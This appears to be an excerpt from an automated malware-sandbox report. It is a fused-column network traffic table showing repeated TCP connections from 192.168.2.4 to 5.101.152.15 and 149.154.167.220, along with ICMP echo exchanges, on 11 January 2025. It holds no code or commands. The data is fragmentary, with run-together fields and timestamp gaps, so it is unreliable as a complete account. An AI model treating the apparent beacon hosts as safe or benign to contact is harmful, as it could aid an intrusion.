                                                                                            Jan 11, 2025 18:07:20.263683081 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263709068 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263761044 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263791084 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263820887 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.275037050 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.275223970 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.275278091 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.275309086 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.275309086 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.275324106 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.275367022 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.279596090 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:21.039527893 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:21.039716005 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:21.039876938 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:21.046456099 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:22.199291945 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:22.204246998 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:22.204354048 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:22.204448938 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:22.209368944 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:22.944300890 CET5364380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:22.949691057 CET80536435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:22.949775934 CET5364380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:22.949912071 CET5364380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:22.954860926 CET80536435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:22.954891920 CET80536435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:22.954922915 CET80536435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.119805098 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.125905991 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.131272078 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.352438927 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.352929115 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.357820988 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.357872963 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.357872963 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.357901096 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.357922077 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.357950926 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.357954025 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.357978106 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.358004093 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.358023882 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.358215094 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.358242035 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.358268976 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.358292103 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.358294010 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.358323097 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.358340025 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.358342886 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.358398914 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.362551928 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.362613916 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.362798929 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.362842083 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.362848997 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.362875938 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.362899065 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.362919092 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.362941980 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.362970114 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363003969 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363017082 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363020897 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363043070 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363066912 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363090992 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363253117 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363284111 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363295078 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363347054 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363358974 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363385916 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363431931 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.363446951 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.363475084 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.367409945 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.367841005 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368113041 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368319035 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368346930 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368377924 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368429899 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368474960 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368500948 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368526936 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368552923 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368598938 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368624926 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368649960 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368674994 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368721962 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368747950 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368773937 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368801117 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368825912 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368851900 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368875980 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368901014 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368927956 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368973017 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.368999004 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.865328074 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:23.910114050 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:23.950131893 CET80536435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:24.003830910 CET5364380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.957917929 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.958178997 CET5364380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.958674908 CET5364480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.963223934 CET80536425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:28.963373899 CET5364280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.963495970 CET80536435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:28.963673115 CET80536445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:28.963737965 CET5364380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.963772058 CET5364480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.963996887 CET5364480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:28.968972921 CET80536445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:28.969003916 CET80536445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:28.969031096 CET80536445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:29.697926044 CET80536445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:24.155985117 CET80539315.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:24.155998945 CET80539315.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:24.156012058 CET80539315.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:24.892333984 CET80539315.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:24.988504887 CET5393180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:29.895102024 CET5393180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:29.897109985 CET5393280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:29.900311947 CET80539315.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:29.900501013 CET5393180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:29.901978970 CET80539325.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:29.902348995 CET5393280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:29.902348995 CET5393280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:29.907258987 CET80539325.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:29.907274008 CET80539325.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:29.907285929 CET80539325.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:30.675657034 CET80539325.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:30.790600061 CET5393280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:35.691998005 CET5393280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:35.692677021 CET5393380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:35.697144985 CET80539325.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:35.697192907 CET5393280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:35.697521925 CET80539335.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:35.697586060 CET5393380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:35.697709084 CET5393380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:35.702541113 CET80539335.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:35.702549934 CET80539335.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:35.702558994 CET80539335.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:36.418359995 CET80539335.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:36.488456964 CET5393380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:41.427084923 CET5393380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:41.428332090 CET5393480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:41.432219982 CET80539335.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:41.432276964 CET5393380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:41.433159113 CET80539345.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:41.433255911 CET5393480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:41.433372974 CET5393480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:41.438271999 CET80539345.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:41.438335896 CET80539345.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:41.438349962 CET80539345.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:42.175010920 CET80539345.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:42.285456896 CET5393480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:47.192126989 CET5393480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:47.192923069 CET5393580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:47.197304010 CET80539345.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:47.197372913 CET5393480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:47.197788954 CET80539355.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:47.197861910 CET5393580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:47.198117018 CET5393580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:47.202990055 CET80539355.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:47.203002930 CET80539355.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:47.203016043 CET80539355.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:47.955065012 CET80539355.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:48.024768114 CET5393580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:52.958165884 CET5393680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:52.963083029 CET80539365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:52.967174053 CET5393680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:52.967303038 CET5393680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:52.972163916 CET80539365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:52.972173929 CET80539365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:52.972182035 CET80539365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:53.718880892 CET80539365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:53.879131079 CET5393680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:54.806205988 CET5393580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:58.723859072 CET5393680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:58.723860025 CET5393780192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:58.728840113 CET80539375.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:58.729096889 CET80539365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:58.730210066 CET5393680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:58.730211973 CET5393780192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:58.733536959 CET5393780192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:09:58.738409996 CET80539375.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:58.738425016 CET80539375.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:58.738434076 CET80539375.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:59.485311031 CET80539375.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:09:59.676069975 CET5393780192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:04.564388037 CET5393780192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:04.567730904 CET5393880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:04.569574118 CET80539375.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:04.570776939 CET5393780192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:04.572597027 CET80539385.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:04.572679043 CET5393880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:04.574079990 CET5393880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:04.578895092 CET80539385.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:04.578985929 CET80539385.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:04.578994036 CET80539385.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:05.287916899 CET80539385.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:05.488508940 CET5393880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:10.301533937 CET5393880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:10.302522898 CET5393980192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:10.307940960 CET80539385.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:10.308048010 CET5393880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:10.308707952 CET80539395.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:10.308901072 CET5393980192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:10.309047937 CET5393980192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:10.314539909 CET80539395.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:10.314555883 CET80539395.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:10.314570904 CET80539395.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:11.064337969 CET80539395.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:11.269778013 CET5393980192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:16.067882061 CET5393980192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:16.069248915 CET5394080192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:16.073139906 CET80539395.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:16.073198080 CET5393980192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:16.074126959 CET80539405.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:16.074189901 CET5394080192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:16.074358940 CET5394080192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:16.079214096 CET80539405.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:16.079224110 CET80539405.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:16.079231024 CET80539405.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:16.847018957 CET80539405.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:16.988586903 CET5394080192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:21.848323107 CET5394080192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:21.849081039 CET5394180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:21.853357077 CET80539405.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:21.853498936 CET5394080192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:21.853895903 CET80539415.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:21.857290030 CET5394180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:21.857414961 CET5394180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:21.862261057 CET80539415.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:21.862271070 CET80539415.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:21.862278938 CET80539415.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:22.655172110 CET80539415.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:22.805346012 CET5394180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:27.661372900 CET5394280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:27.661391973 CET5394180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:27.667196035 CET80539425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:27.667283058 CET80539415.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:27.667363882 CET5394180192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:27.667371988 CET5394280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:27.667526960 CET5394280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:27.672435045 CET80539425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:27.672449112 CET80539425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:27.672461987 CET80539425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:28.415582895 CET80539425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:28.472927094 CET5394280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:33.426933050 CET5394280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:33.428167105 CET5394380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:33.432029963 CET80539425.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:33.432120085 CET5394280192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:33.432995081 CET80539435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:33.433254957 CET5394380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:33.433279037 CET5394380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:33.438121080 CET80539435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:33.438133955 CET80539435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:33.438147068 CET80539435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:34.193864107 CET80539435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:34.285420895 CET5394380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:39.207873106 CET5394380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:39.208573103 CET5394480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:39.213109016 CET80539435.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:39.213474989 CET80539445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:39.214277983 CET5394380192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:39.214282990 CET5394480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:39.214437962 CET5394480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:39.220706940 CET80539445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:39.220721006 CET80539445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:39.220731974 CET80539445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:39.949934006 CET80539445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:40.082427979 CET5394480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:44.957668066 CET5394480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:44.958118916 CET5394580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:44.962857962 CET80539445.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:44.962981939 CET80539455.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:44.963054895 CET5394480192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:44.963071108 CET5394580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:44.963181019 CET5394580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:44.968040943 CET80539455.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:44.968136072 CET80539455.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:44.968164921 CET80539455.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:45.731498003 CET80539455.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:45.785456896 CET5394580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:50.738965988 CET5394580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:50.739676952 CET5394680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:50.744189978 CET80539455.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:50.744244099 CET5394580192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:10:50.744563103 CET80539465.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:10:50.744635105 CET5394680192.168.2.45.101.152.15
Timestamp    Source Port    Dest Port    Source IP    Dest IP
Timestamp    Source IP    Dest IP    Checksum    Code    Type
                                                                                            Jan 11, 2025 18:09:53.145340919 CET5.101.152.15192.168.2.454feEcho Reply
                                                                                            Jan 11, 2025 18:09:58.179261923 CET192.168.2.45.101.152.154cfdEcho
                                                                                            Jan 11, 2025 18:09:58.238389015 CET5.101.152.15192.168.2.454fdEcho Reply
                                                                                            Jan 11, 2025 18:09:58.239829063 CET192.168.2.45.101.152.154cfcEcho
                                                                                            Jan 11, 2025 18:09:58.298769951 CET5.101.152.15192.168.2.454fcEcho Reply
                                                                                            Jan 11, 2025 18:09:58.301176071 CET192.168.2.45.101.152.154cfbEcho
                                                                                            Jan 11, 2025 18:09:58.360152006 CET5.101.152.15192.168.2.454fbEcho Reply
                                                                                            Jan 11, 2025 18:09:58.360517979 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:03.333942890 CET192.168.2.45.101.152.154cfaEcho
                                                                                            Jan 11, 2025 18:10:03.393090963 CET5.101.152.15192.168.2.454faEcho Reply
                                                                                            Jan 11, 2025 18:10:03.394000053 CET192.168.2.45.101.152.154cf9Echo
                                                                                            Jan 11, 2025 18:10:03.455032110 CET5.101.152.15192.168.2.454f9Echo Reply
                                                                                            Jan 11, 2025 18:10:03.456343889 CET192.168.2.45.101.152.154cf8Echo
                                                                                            Jan 11, 2025 18:10:03.515460968 CET5.101.152.15192.168.2.454f8Echo Reply
                                                                                            Jan 11, 2025 18:10:08.521392107 CET192.168.2.45.101.152.154cf7Echo
                                                                                            Jan 11, 2025 18:10:08.580693960 CET5.101.152.15192.168.2.454f7Echo Reply
                                                                                            Jan 11, 2025 18:10:08.582808971 CET192.168.2.45.101.152.154cf6Echo
                                                                                            Jan 11, 2025 18:10:08.641887903 CET5.101.152.15192.168.2.454f6Echo Reply
                                                                                            Jan 11, 2025 18:10:08.644474983 CET192.168.2.45.101.152.154cf5Echo
                                                                                            Jan 11, 2025 18:10:08.703452110 CET5.101.152.15192.168.2.454f5Echo Reply
                                                                                            Jan 11, 2025 18:10:13.710447073 CET192.168.2.45.101.152.154cf4Echo
                                                                                            Jan 11, 2025 18:10:13.769650936 CET5.101.152.15192.168.2.454f4Echo Reply
                                                                                            Jan 11, 2025 18:10:13.770922899 CET192.168.2.45.101.152.154cf3Echo
                                                                                            Jan 11, 2025 18:10:13.817329884 CET192.168.2.45.101.152.154cf2Echo
                                                                                            Jan 11, 2025 18:10:13.830260038 CET5.101.152.15192.168.2.454f3Echo Reply
                                                                                            Jan 11, 2025 18:10:13.830337048 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:13.876416922 CET5.101.152.15192.168.2.454f2Echo Reply
                                                                                            Jan 11, 2025 18:10:18.880913973 CET192.168.2.45.101.152.154cf1Echo
                                                                                            Jan 11, 2025 18:10:18.940089941 CET5.101.152.15192.168.2.454f1Echo Reply
